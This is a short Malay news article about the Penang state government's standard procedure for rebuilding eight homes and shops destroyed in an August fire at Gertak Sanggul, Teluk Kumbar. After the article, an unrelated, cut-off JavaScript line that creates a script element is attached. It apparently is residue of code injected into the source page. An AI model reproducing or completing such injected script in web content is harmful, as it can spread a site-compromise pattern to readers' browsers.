Bina semula rumah mangsa kebakaran, KN ikut SOP – Exco

GEORGE TOWN – Kerajaan Negeri mempunyai Tatacara Pengendalian Piawai (SOP) yang perlu diikuti berhubung pembinaan semula rumah baharu bagi mangsa-mangsa kebakaran di Gertak Sanggul, Teluk Kumbar yang mana tertakluk kepada ‘kebenaran’ pemilik tanah berkenaan.

Exco Kebajikan, Masyarakat Penyayang dan Alam Sekitar, Phee Boon Poh berkata, pembinaan semula rumah baharu bagi mangsa-mangsa kebakaran adalah tertakluk kepada pemilik tanah.

“Kita (Kerajaan Negeri) mempunyai Tatacara Pengendalian Piawai (SOP) yang perlu diikuti iaitu pemilik tanah tersebut mestilah membenarkan pembinaan semula rumah berkaitan dan pelan perancangan pembinaan diluluskan oleh Majlis Bandaraya Pulau Pinang (MBPP).

“Sekiranya pemilik tidak membenarkannya, maka Kerajaan Negeri boleh mempertimbangkan untuk keluarga terlibat diberi keutamaan bagi memiliki seunit rumah kos rendah di kawasan berhampiran,” ujarnya pada sidang media di sini baru-baru ini.

Boon Poh berkata demikian sebagai mengulas kejadian 16 Ogos lalu yang telah memusnahkan lapan rumah termasuk dua kedai runcit serta sebuah kedai kopi, malah dua unit kediaman berhampiran turut mengalami kerosakan akibat terkena percikan api.

var d=document;var s=d.createElement(‘script’);